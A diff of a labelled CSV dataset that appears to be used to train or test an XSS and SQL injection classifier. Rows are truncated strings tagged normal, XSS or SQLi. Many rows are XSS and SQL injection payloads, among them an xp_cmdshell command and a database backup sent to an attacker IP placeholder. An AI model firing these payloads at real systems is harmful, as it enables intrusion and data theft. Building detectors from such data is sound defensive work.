id=x></hgroup><,1,XSS,8872 -"1%"" ) or 5286 = ( select count ( * ) from all_user",2,SQLi,17928 -"<meta HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascri",1,XSS,1498 -"{""id"":null,""firstName"":""Buddhika"",""lastName"":""Hong",0,normal,27428 -`'><script>\xEF\xBF\xBEjavascript:alert(529)</scri,1,XSS,8993 -He addressed a comparatively small and select circ,0,normal,26127 +) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR,2,SQLi,11342 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,12909 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2425 +1 ) where 7588 = 7588 or 7417 = ( select count ( *,2,SQLi,22315 +1%' ) ) ) and 2716 = ( select count ( * ) from sys,2,SQLi,16854 +<style>:target {color: red;}</style><xmp id=x styl,1,XSS,6807 +-1280' ) ) or 8571 = 8571--,2,SQLi,20374 +or 'a' = 'a,2,SQLi,11632 +Order a tasty dessert.,0,normal,22569 +Select your defeat.,0,normal,25014 +1'|| ( select 'dpce' from dual where 5261 = 5261 u,2,SQLi,21953 +I'm considering where to enjoy a meal.,0,normal,23804 +1' where 8469 = 8469,2,SQLi,18698 +Select the right app for productivity.,0,normal,24077 +"<img src=x onerror=\x11""javascript:alert(1)"">",1,XSS,680 +Select your swear.,0,normal,24955 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4172 +Just select the books category with the drop-down ,0,normal,25927 +"<ol onmouseup=""alert(1)"">test</ol>",1,XSS,8602 +"-2007%' ) ) union all select 7298,7298,7298#",2,SQLi,17448 +Filter the spam messages from your inbox.,0,normal,22909 +"Select wallpapers will be $211-$227 per panel, and",0,normal,25571 +"<q draggable=""true"" ondragleave=""alert(1)"">test</q",1,XSS,4125 +><embed src='//ajax.googleapis.com/ajax/libs/yui/2,1,XSS,9818 +><script+src=https://wb.amap.com/channel.php?callb,1,XSS,9790 +"1%"" ) and 6510 = ( select count ( * ) from sysuser",2,SQLi,16583 +<input type=text value=”A” autofocus onfocus=alert,1,XSS,9748 +"<del onmousemove=""alert(1)"">test</del>",1,XSS,8143 +"<iframe srcdoc=""<img src=1 onerror=alert(1)>""></if",1,XSS,171 +"1"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121",2,SQLi,13099 +"<style>@keyframes x{}</style><nobr style=""animatio",1,XSS,2884 +"<dfn draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,3208 +1'|| ( select 'homm' where 4937 = 4937 rlike ( sel,2,SQLi,16232 +I'm considering where to have a romantic dinner.,0,normal,23819 +Find data where required.,0,normal,23346 +Merge the puzzle sections.,0,normal,22660 +"1%"" ) ) ) and 8438 = 7620--",2,SQLi,19143 +"&lt;!--#exec cmd=\""/bin/echo '&lt;SCR'\""--&gt;&lt;",1,XSS,1035 +1 ( select ( case when ( 5451 = 5451 ) then regexp,2,SQLi,13600 +select sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,14538 +I'm considering where to have dinner tonight.,0,normal,23887 +Redirect 302 /a.jpg http://victimsite.com/admin.as,1,XSS,1387 +"1"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,13976 +"<body onunload=""javascript:alert('XSS');"">",1,XSS,1297 +"<video draggable=""true"" ondrag=""alert(1)"">test</vi",1,XSS,8878 +1 ) ) and 6510 = ( select count ( * ) from sysuser,2,SQLi,15146 +I'm considering where to attend a workshop.,0,normal,23976 +"<table onmousedown=""alert(1)"">test</table>",1,XSS,3128 +1' ) ) ) rlike ( select ( case when ( 5855 = 7142 ,2,SQLi,22323 +Select your change.,0,normal,25035 +"1"" where 8732 = 8732",2,SQLi,20320 +"1"" ) ) as aamh where 7432 = 7432 ( select ( case w",2,SQLi,17421 +"<mark oncopy=""alert(1)"" contenteditable>test</mark",1,XSS,7363 +<style>:target {color: red;}</style><listing id=x ,1,XSS,8874 +1' and 7533 = 7533 and 'clqy' like 'clqy,2,SQLi,17926 +"<meta HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://",1,XSS,1499 +They can also get 50% off on Hotel Collection Bedd,0,normal,25316 +autofocus/onfocus=alert(1)//,1,XSS,8995 +"1 ) where 2473 = 2473 and updatexml ( 3393,concat ",2,SQLi,17008 "<IMG LOWSRC=""javascript:javascript:alert(1)"">",1,XSS,748 -from,0,normal,26522 -1 ) ) ) or 9643 = ( select count ( * ) from domain,2,SQLi,12222 -"<img usemap=#x><map name=""x""><area href onfocus=al",1,XSS,5982 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,17317 -Select a fragrance for the air freshener.,0,normal,24014 -"<footer oncut=""alert(1)"" contenteditable>test</foo",1,XSS,2207 -"<audio draggable=""true"" ondrag=""alert(1)"">test</au",1,XSS,3057 -"1"" ) where 4180 = 4180 or char ( 68 ) ||char ( 69 ",2,SQLi,17744 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7380 +Calculate sums where applicable.,0,normal,23273 +"1 procedure analyse ( extractvalue ( 5840,concat (",2,SQLi,12224 +"<base onmouseout=""alert(1)"">test</base>",1,XSS,5984 +"{""id"":null,""name"":""mouse bag""}",0,normal,26831 +Select the right camera settings for the shot.,0,normal,24011 +<q id=x tabindex=1 onfocus=alert(1)></q>,1,XSS,2208 +<svg><plaintext onload=alert(1)></plaintext>,1,XSS,3058 +1%' ) ) or 4411 = ( select count ( * ) from sysuse,2,SQLi,17742 +"<style>@keyframes slidein {}</style><var style=""an",1,XSS,7382 `'><script>\x20javascript:alert(1)</script>,1,XSS,591 -select case when 4488 = 5522 then 1 else null end-,2,SQLi,18378 -"<fieldset onmouseup=""alert(1)"">test</fieldset>",1,XSS,7509 -"<html onmouseenter=""alert(1)"">test</html>",1,XSS,4229 -"select * from users where id = 1 or "" ) $"" or 1 = ",2,SQLi,11882 -1'|| ( select 'dfmw' from dual where 1723 = 1723,2,SQLi,22369 -"<br SIZE=""&{document.vulnerable=true}"">",1,XSS,1492 -<big onpointerout=alert(1)>XSS</big>,1,XSS,6570 --7453' ) ) ) or 8571 = 8571--,2,SQLi,14177 -"AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000",2,SQLi,11357 -"-1766"" ) ) ) or 2724 in ( ( char ( 113 ) +char ( 1",2,SQLi,17190 -Select voyage.,0,normal,24650 -Select sparkle.,0,normal,24680 -"1%' ) union all select null,null#",2,SQLi,19470 -"<meter onkeypress=""alert(1)"" contenteditable>test<",1,XSS,7090 -<code onfocusout=alert(1) tabindex=1 id=x></code><,1,XSS,5266 -select ( case when ( 8916 = 1357 ) then 8916 else ,2,SQLi,17994 -"<div id=""95""><svg xmlns=""http://www.w3.org/2000/sv",1,XSS,9155 -"<select onmouseenter=""alert(1)"">test</select>",1,XSS,3137 -<script/src=data&colon;text/j\u0061v\u0061&#115&#9,1,XSS,9263 -"<img onkeypress=""alert(1)"" contenteditable>test</i",1,XSS,8723 -or 1 = 1#,2,SQLi,12072 -Select your defeat.,0,normal,25014 -1 ) as ooex where 1087 = 1087 or char ( 119 ) ||ch,2,SQLi,16131 -<select onchange=alert(1)><option>1<option>2,1,XSS,9302 -select * from users where id = 1 union select @ 1$,2,SQLi,11639 - or 3 = 3 --,2,SQLi,11479 -"<menu draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,7557 -"1 ) where 9059 = 9059 and extractvalue ( 7982,conc",2,SQLi,18835 -<listing id=x tabindex=1 ondeactivate=alert(1)></l,1,XSS,8380 -"iif ( 8213 = 4718,1,1/0 )",2,SQLi,19401 -"<dt oncontextmenu=""alert(1)"">test</dt>",1,XSS,3326 -<style>:target {color: red;}</style><content id=x ,1,XSS,5804 -Select negotiate.,0,normal,24764 -<svg id=alert(1) onload=eval(id)>,1,XSS,9696 -1' waitfor delay '0:0:5' and 'dtej' like 'dtej,2,SQLi,17513 -<bdi onpointerover=alert(1)>XSS</bdi>,1,XSS,4317 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4675 -select,0,normal,26629 -`'><script>\x0Cjavascript:alert(515)</script>,1,XSS,8969 -) or ('1'='1'/*,2,SQLi,9983 -"1' ) where 8125 = 8125 and 4241 = convert ( int, (",2,SQLi,15978 -Other deals include $303 off select Playstation 4 ,0,normal,25802 -"<ul draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,4683 -"{""id"":null,""name"":""transportation""}",0,normal,27389 -<video controls autoplay onended=alert(1)><source ,1,XSS,3361 -"My short film, ""Amalia,"" became an official select",0,normal,25872 -"1%' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,18948 -<svg><rb onload=alert(1)></rb>,1,XSS,7203 -"<col oncut=""alert(1)"" contenteditable>test</col>",1,XSS,4765 -Calculate sums where necessary.,0,normal,23336 -Select your peek.,0,normal,24985 -select * from users where id = 1 + ( \ ) union sel,2,SQLi,11518 -Select consumer staple ETFs such as the Vanguard C,0,normal,25635 -1' ) ) as bwjl where 8538 = 8538 union all select ,2,SQLi,16986 -1' ) ) as vrwr where 3830 = 3830,2,SQLi,16272 -Select a hairstyle for a transformation.,0,normal,24220 +1'+ ( select xruo where 5709 = 5709 and 7533 = 753,2,SQLi,18376 +"<basefont ondblclick=""alert(1)"">test</basefont>",1,XSS,7511 +"<head onmouseover=""alert(1)"">test</head>",1,XSS,4231 +select * from users where id = '1' + $+%$ or 1 = 1,2,SQLi,11884 +"-6798%"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr",2,SQLi,22367 +"<LAYER SRC=""javascript:document.vulnerable=true;"">",1,XSS,1493 +<details id=x tabindex=1 onfocusin=alert(1)></deta,1,XSS,6572 +"1"" ) ) as vxkn where 2443 = 2443 or 4411 = ( selec",2,SQLi,14179 +"AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000",2,SQLi,11359 +"1%' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c",2,SQLi,17188 +Select ride.,0,normal,24647 +"1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,18971 +1'|| ( select 'glyc' from dual where 4058 = 4058,2,SQLi,20517 +<sup id=x tabindex=1 ondeactivate=alert(1)></sup><,1,XSS,7092 +"<shadow onclick=""alert(1)"">test</shadow>",1,XSS,5268 +1%' ) ) and 8514 = ( select count ( * ) from domai,2,SQLi,17322 +"<div id=""97""><!-- IE 5-9 -->",1,XSS,9157 +<link onpointerover=alert(1)>XSS</link>,1,XSS,3139 +<script> (function (o) { function exploit(x) { if ,1,XSS,9265 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8725 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,12074 +cross,0,normal,23152 +"1"" where 5845 = 5845 and 5556 = ( select count ( *",2,SQLi,16863 +"<set attributeName=""xlink:href"" begin=""accessKey(a",1,XSS,9304 +select * from users where id = 1 or @$# = 1 union ,2,SQLi,11641 +select * from users where id = 1 <@$$ union select,2,SQLi,11481 +"<style>:target {color:red;}</style><i id=x style=""",1,XSS,7559 +"1"" ) where 7753 = 7753",2,SQLi,20095 +<var id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,8382 +1' ) or 2367 = ( select count ( * ) from rdb$field,2,SQLi,19399 +"<font onkeydown=""alert(1)"" contenteditable>test</f",1,XSS,3328 +"<table draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,5806 +Select swap.,0,normal,24761 +><svg/onload=alert(/XSS/),1,XSS,9698 +1,0,normal,26726 +<spacer onpointerup=alert(1)>XSS</spacer>,1,XSS,4319 +"<q draggable=""true"" ondrag=""alert(1)"">test</q>",1,XSS,4677 +1 ) ) as vrev where 4248 = 4248 and updatexml ( 33,2,SQLi,19810 +`'><script>\x2531javascript:alert(531)</script>,1,XSS,8971 +or'1=1,2,SQLi,9985 +1 where 9620 = 9620 waitfor delay '0:0:5'--,2,SQLi,15970 +1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch,2,SQLi,19224 +<img onblur=alert(1) tabindex=1 id=x></img><input ,1,XSS,4685 +word1,0,normal,26539 +"<style>@keyframes x{}</style><del style=""animation",1,XSS,3363 +1' ) as sjmt where 6541 = 6541 or 8421 = ( select ,2,SQLi,16073 +1' where 1085 = 1085 or 8315 = ( select count ( * ,2,SQLi,18946 +"<table onbeforecut=""alert(1)"" contenteditable>test",1,XSS,7205 +top[‘al\x65rt’](1),1,XSS,4767 +Specify filters where valid.,0,normal,23333 +Select your see.,0,normal,24982 +and 1 in ( select var from temp ) --,2,SQLi,11520 +Select the next place to visit.,0,normal,24228 +1' and ( select 2* ( if ( ( select * from ( select,2,SQLi,16984 +1' ) as bagi where 1281 = 1281 ( select ( case whe,2,SQLi,16264 +1' ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ,2,SQLi,16842 "<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></S",1,XSS,825 -1' ) as fkpn where 1100 = 1100,2,SQLi,20738 -"{""id"":null,""name"":""railroad""}",0,normal,27299 -1 ) ) as ambt where 5198 = 5198 and char ( 120 ) |,2,SQLi,12444 --1280' ) ) or 8571 = 8571--,2,SQLi,20374 -Where's the nature reserve?,0,normal,23592 -"<;IMG STYLE="";xss:expr/*XSS*/ession(alert(';XSS';)",1,XSS,1613 -1' and 9198 = 9198--,2,SQLi,17770 -I select.,0,normal,24450 -"1' ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,21190 -Let's choose a location for our meetup.,0,normal,23862 -"1 ) ) union all select null,null,null,null--",2,SQLi,14427 -"1%"" ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ",2,SQLi,19629 -"select * from users where id = 1 or "". ) "" or 1 = ",2,SQLi,11623 -"-4304' where 1005 = 1005 union all select 1005,100",2,SQLi,15176 -&lt;SCRIPT&gt;a=/XSS/,1,XSS,1452 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4877 -<!--[if gte IE 4]><SCRIPT>document.vulnerable=true,1,XSS,1514 -"<colgroup draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2676 -"1' where 2373 = 2373 union all select null,null#",2,SQLi,20063 -<x oncut=alert(1)>cut this!,1,XSS,9718 -<dl id=x tabindex=1 onfocusin=alert(1)></dl>,1,XSS,6609 -"<em onkeyup=""alert(1)"" contenteditable>test</em>",1,XSS,5090 -1%' ) ) and sleep ( 5 ) #,2,SQLi,15212 -Choose a frame style by clicking the selector butt,0,normal,26288 -<basefont onpointerdown=alert(1)>XSS</basefont>,1,XSS,8714 -1'+ ( select acax where 4169 = 4169 or 5286 = ( se,2,SQLi,18789 -select,0,normal,26641 -"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,20804 -<animate onpointerout=alert(1)>XSS</animate>,1,XSS,2257 -<figcaption onpointerleave=alert(1)>XSS</figcaptio,1,XSS,1745 -random,0,normal,23222 -<colgroup onpointerout=alert(1)>XSS</colgroup>,1,XSS,4863 -1 ) where 5234 = 5234 or 8514 = benchmark ( 500000,2,SQLi,22160 +Select your discussion.,0,normal,24908 +"{""id"":null,""name"":""Venipede""}",0,normal,27298 +"end and ( ""xksk"" = ""xksk",2,SQLi,12446 +"-7202%"" ) ) union all select 2901#",2,SQLi,20372 +"I still don't want you to cut up your clothes, but",0,normal,26066 +"<;XSS STYLE="";xss:expression(alert(';XSS';))"";>;",1,XSS,1614 +select ( case when ( 4415 = 2051 ) then 4415 else ,2,SQLi,17768 +Choose and select wisely.,0,normal,24447 +select ( case when ( 2830 = 7046 ) then 2830 else ,2,SQLi,21188 +Let's discuss where to go for the team outing.,0,normal,23859 +"1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171",2,SQLi,14429 +end,0,normal,23148 +group by userid having 1 = 1--,2,SQLi,11625 +1 where 1015 = 1015,2,SQLi,15168 +&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.,1,XSS,1453 +"<strong draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,4879 +"<base HREF=""javascript:document.vulnerable=true;//",1,XSS,1515 +"<samp onclick=""alert(1)"">test</samp>",1,XSS,2677 +"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,17655 +"<img src=""1"" onerror=""&#x61;&#x6c;&#x65;&#x72;&#x7",1,XSS,9720 +"<var onmouseleave=""alert(1)"">test</var>",1,XSS,6611 +<applet id=x tabindex=1 onactivate=alert(1)></appl,1,XSS,5092 +-1760 ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( 154,2,SQLi,15204 +Choosing baby monitors for your home requires rese,0,normal,26285 +<style>@keyframes slidein {}</style><section style,1,XSS,8716 +1' ) as hlbq where 2347 = 2347 and 6055 = ctxsys.d,2,SQLi,18787 +select,0,normal,26638 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18137 +<frame onpointerleave=alert(1)>XSS</frame>,1,XSS,2258 +<datalist id=x tabindex=1 onfocusin=alert(1)></dat,1,XSS,1746 +Delete the duplicate files.,0,normal,22624 +<template onpointermove=alert(1)>XSS</template>,1,XSS,4865 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,19895 <SCRIPT SRC=//ha.ckers.org/.j>,1,XSS,812 "<div/style=""width:expression(confirm(1))"">X</div> ",1,XSS,869 -1 ) as fhvb where 4008 = 4008,2,SQLi,15814 --9700' ) or 8811 = 7862,2,SQLi,16262 -1 ) as mwcs where 2544 = 2544 and exp ( ~ ( select,2,SQLi,20893 -1%' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 ,2,SQLi,14414 -%3Cimg/src=%3Dx+onload=alert(2)%3D,1,XSS,9735 -She'll select her hairstyle.,0,normal,24352 -They did not conduct any bidding to select the und,0,normal,25311 -1'+ ( select 'swxi' where 7651 = 7651 and 6414 = (,2,SQLi,20963 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3281 -Select your meditate.,0,normal,24973 --7999 ) or 8422 = 1336,2,SQLi,12142 -Select your team.,0,normal,24807 -<canvas id=x tabindex=1 ondeactivate=alert(1)></ca,1,XSS,8786 -"1%"" rlike ( select * from ( select ( sleep ( 5 ) )",2,SQLi,14075 -"<li draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,7141 -"<font oncut=""alert(1)"" contenteditable>test</font>",1,XSS,8597 --8069' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,18465 -"1' ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d45",2,SQLi,13607 -1 ) as hywx where 1424 = 1424 and 8514 = ( select ,2,SQLi,17528 -"1"" or 6793 = ( select 6793 from pg_sleep ( 5 ) ) a",2,SQLi,13698 -1,0,normal,26733 -"-9509 ) union all select 1193,1193,1193#",2,SQLi,15354 -<td onfocusout=alert(1) tabindex=1 id=x></td><inpu,1,XSS,3505 -"<style>@keyframes slidein {}</style><span style=""a",1,XSS,3525 -"1 ) where 2044 = 2044 or elt ( 6272 = 6272,sleep (",2,SQLi,14748 -"<img src=""javascript:alert(2)"">",1,XSS,9211 -1' ) where 4407 = 4407 and char ( 107 ) ||char ( 1,2,SQLi,18536 -"1"" ) ) as dshc where 9911 = 9911 or 1022 = ( selec",2,SQLi,14342 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5421 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6725 -"1%"" and make_set ( 2905 = 5725,5725 ) and ""%"" = """,2,SQLi,21900 -"<label oncut=""alert(1)"" contenteditable>test</labe",1,XSS,5080 -Select your vow.,0,normal,24953 -"<shadow onmousedown=""alert(1)"">test</shadow>",1,XSS,2559 -1'|| ( select 'vekn' from dual where 4929 = 4929 a,2,SQLi,13156 -"ABC Home: Up to 60% off select sofas and seating, ",0,normal,26415 -BACKUP database master to disks='\\<attackerip>\<a,2,SQLi,10037 --1499 ) as gxfm where 9762 = 9762 or 5989 = 4782--,2,SQLi,14640 -select ( case when ( 5970 = 2200 ) then 1 else 597,2,SQLi,13812 -"1"" ) union all select null,null,null,null#",2,SQLi,13511 -"<plaintext oncut=""alert(1)"" contenteditable>test</",1,XSS,1774 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16056 -"{""id"":null,""name"":""Coredramon (Blue)""}",0,normal,26926 -"1"" ) or ( select 2* ( if ( ( select * from ( selec",2,SQLi,17983 -"1"" ) ) or ( select * from ( select ( sleep ( 5 ) )",2,SQLi,12726 -"<IMG SRC=x onchange=""alert(String.fromCharCode(88,",1,XSS,1187 -1%' ) ) and 7533 = 7533 and ( ( '%' = ',2,SQLi,16712 -"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,19991 -"<style>@keyframes x{}</style><rp style=""animation-",1,XSS,8521 -"1"" ) ) as xcyo where 2929 = 2929",2,SQLi,18205 -She updates her hairstyle.,0,normal,23000 -"<ul onmouseover=""alert(1)"">test</ul>",1,XSS,7320 -Delete apps.,0,normal,23077 -"<menu onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,5295 -"<address onmouseover=""alert(1)"">test</address>",1,XSS,4474 -select * from users where id = 1 <@.$ union select,2,SQLi,11565 -Sort the files.,0,normal,22855 -I need to select the right book to read.,0,normal,23692 -1 or ( select 2* ( if ( ( select * from ( select c,2,SQLi,19797 -"-3031"" union all select 2681#",2,SQLi,21491 -"1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 1",2,SQLi,22105 -"admin"") or (""1""=""1""--",2,SQLi,9936 -One way of having a higher income is to initially ,0,normal,25823 -1%' or 5356 = ( select count ( * ) from sysusers a,2,SQLi,18110 -"-9557%"" ) ) ) or 4747 = dbms_utility.sqlid_to_sqlh",2,SQLi,17114 -<base id=x tabindex=1 onfocusin=alert(1)></base>,1,XSS,2017 -select * from users where id = 1 or \.<$ or 1 = 1 ,2,SQLi,11710 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,16687 -"Select the "" subtract "" option - second from the l",0,normal,25607 -"{""id"":null,""name"":""BaoHuckmon""}",0,normal,27059 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3606 -1'|| ( select 'fcws' from dual where 9184 = 9184 a,2,SQLi,14700 -Create a stunning sculpture from clay.,0,normal,22980 -<img src='1' onerror='alert(0)' <,1,XSS,9453 -"<body onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,4605 -"select * from users where id = 1 or 1#""? union sel",2,SQLi,11589 -"<bgsound onmousedown=""alert(1)"">test</bgsound>",1,XSS,6148 -"1"" ) ) or 5286 = ( select count ( * ) from all_use",2,SQLi,17815 -into,0,normal,23128 -"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,14321 -1%' ) and ( 7704 = 3494 ) *3494 and ( '%' = ',2,SQLi,13444 -#ERROR!,2,SQLi,22539 -Select fork.,0,normal,24529 +"-5493"" ) ) union all select 8001,8001--",2,SQLi,15806 +Select a strategy for the game.,0,normal,24156 +1' rlike ( select ( case when ( 1916 = 7874 ) then,2,SQLi,20891 +1' ) where 2763 = 2763,2,SQLi,14416 +%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert,1,XSS,9737 +Select your dream destination city.,0,normal,24349 +They no longer select the chairmen of parliamentar,0,normal,25308 +"1"" where 7631 = 7631 and 4733 = 3439",2,SQLi,16245 +<shadow onpointerleave=alert(1)>XSS</shadow>,1,XSS,3283 +Select your ponder.,0,normal,24970 +1 ) ) as potk where 5040 = 5040 or elt ( 5873 = 58,2,SQLi,12144 +"1"" ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,18662 +<input4 onpointermove=alert(1)>XSS</input4>,1,XSS,8788 +1%' ) ) ) and sleep ( 5 ) #,2,SQLi,14077 +"<menuitem onpaste=""alert(1)"" contenteditable>test<",1,XSS,7143 +"<div onkeypress=""alert(1)"" contenteditable>test</d",1,XSS,8599 +1 where 7522 = 7522 and ( select 2* ( if ( ( selec,2,SQLi,19213 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13609 +1' ) ) as owcw where 1107 = 1107 and 8312 = dbms_p,2,SQLi,17526 +"1"" ) where 6632 = 6632 or 2633 = dbms_pipe.receive",2,SQLi,13700 +1,0,normal,26730 +"-7941%' ) union all select 6965,6965,6965,6965--",2,SQLi,17694 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3507 +"<map onmousedown=""alert(1)"">test</map>",1,XSS,3527 +1' in boolean mode ) or char ( 119 ) ||char ( 100 ,2,SQLi,17152 +"<import namespace=""t"" implementation=""#default#tim",1,XSS,9213 +1' ) as cdrm where 4595 = 4595 order by 1#,2,SQLi,18534 +1' ) where 9544 = 9544 or exp ( ~ ( select * from ,2,SQLi,14344 +"<var onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,5423 +"<acronym onclick=""alert(1)"">test</acronym>",1,XSS,6727 +"-8790' ) or 1570 = convert ( int, ( select char ( ",2,SQLi,21898 +"<IMG SRC=""jav&#x0D;ascript:alert('');"">",1,XSS,5082 +Select your commitment.,0,normal,24950 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2560 +1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ),2,SQLi,13158 +"According to a statement released by the airline, ",0,normal,26412 +; exec master..xp_cmdshell 'ping 10.10.1.2'--,2,SQLi,10039 +1' ) as fksm where 9714 = 9714,2,SQLi,14633 +"1"" ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ",2,SQLi,13814 +select ( case when ( 9667 = 6212 ) then 9667 else ,2,SQLi,13513 +"<s onmousedown=""alert(1)"">test</s>",1,XSS,1775 +"1"" procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,16048 +"{""id"":null,""name"":""WarGreymon""}",0,normal,26923 +1 ) as mixt where 1085 = 1085 or sleep ( 5 ) --,2,SQLi,17981 +1%' ) ) or sleep ( 5 ) #,2,SQLi,12728 +"<IMG SRC=x oncontextmenu=""alert(String.fromCharCod",1,XSS,1188 +"1' ) and elt ( 1407 = 6365,6365 ) and ( 'zckl' = '",2,SQLi,17602 +"-9014%' ) union all select 4211,4211,4211,4211,421",2,SQLi,19989 +"<b oncopy=""alert(1)"" contenteditable>test</b>",1,XSS,8523 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18203 +-5147 or ( 8459 = 8459 ) *4906,2,SQLi,18762 +"<xmp onkeypress=""alert(1)"" contenteditable>test</x",1,XSS,7322 +Where's the piercing studio?,0,normal,23617 +"<datalist onmouseout=""alert(1)"">test</datalist>",1,XSS,5297 +"<em onpaste=""alert(1)"" contenteditable>test</em>",1,XSS,4476 +select * from users where id = '1' <@.$ or 1 = 1 -,2,SQLi,11567 +Filter the dust.,0,normal,22852 +I need to decide where to place the furniture.,0,normal,23689 +"1 ) and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,19795 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,14857 +"select sleep ( 5 ) and ( ( ( ""zlal"" = ""zlal",2,SQLi,22103 +"admin"") or (""1""=""1""/*",2,SQLi,9938 +Only a select handful of politicians get parodied ,0,normal,25820 +"1"" and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,18757 +1 where 8908 = 8908 or 7417 = ( select count ( * ),2,SQLi,21776 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2018 +sleep 50',2,SQLi,11712 +"-2784' ) ) union all select 6775,6775,6775,6775,67",2,SQLi,22020 +"Select the ""Mark as read"" icon from the top toolba",0,normal,25604 +"{""id"":null,""firstName"":""Eng Joo"",""lastName"":""Pok"",",0,normal,27056 +<embed onpointerup=alert(1)>XSS</embed>,1,XSS,3608 +upper,0,normal,23190 +-3937 ) ) or 3038 = 3038,2,SQLi,18531 +<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`8,1,XSS,9455 +"<bdo onmousemove=""alert(1)"">test</bdo>",1,XSS,4607 +select * from users where id = '1' <@&1 or 1 = 1 -,2,SQLi,11591 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6150 +"1"" order by 1--",2,SQLi,17870 +on,0,normal,23125 +-7979'+ ( select 'bkvt' where 3613 = 3613 union al,2,SQLi,14323 +"1"" ) ) ) and 6537 = dbms_pipe.receive_message ( ch",2,SQLi,13446 +#ERROR!,2,SQLi,22536 +-4947' order by 1#,2,SQLi,16362 <script>location='javascript:alert\x281\x29'</scri,1,XSS,132 -"{""id"":null,""name"":""successful""}",0,normal,27470 -<source onfocusout=alert(1) tabindex=1 id=x></sour,1,XSS,4644 -1'+ ( select 'wpnm' where 8223 = 8223 and 6240 = (,2,SQLi,17921 -"-7296%' ) ) ) union all select 9322,9322,9322,9322",2,SQLi,16673 -"select * from users where id = 1 or 1#"" ( union se",2,SQLi,12010 +"{""id"":null,""name"":""shine""}",0,normal,27569 +<col id=x tabindex=1 onfocusin=alert(1)></col>,1,XSS,4646 +1' ) as ssxj where 3845 = 3845 or 7427 = dbms_pipe,2,SQLi,20347 +"1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706",2,SQLi,16671 +"select * from users where id = 1 or "".#"" or 1 = 1 ",2,SQLi,12012 "<a href=""\xE2\x80\x80javascript:javascript:alert(1",1,XSS,498 -select * from users where id = 1 + @<@. union sele,2,SQLi,11807 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10529 -Insert data.,0,normal,23097 -"<dd oncontextmenu=""alert(1)"">test</dd>",1,XSS,4827 -"1"" and 2716 = ( select count ( * ) from sysusers a",2,SQLi,16872 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6175 -"-9140"" ) ) union all select 1623,1623,1623,1623,16",2,SQLi,13721 -"{""id"":null,""firstName"":""William"",""lastName"":""Lambe",0,normal,27019 -) WAITFOR 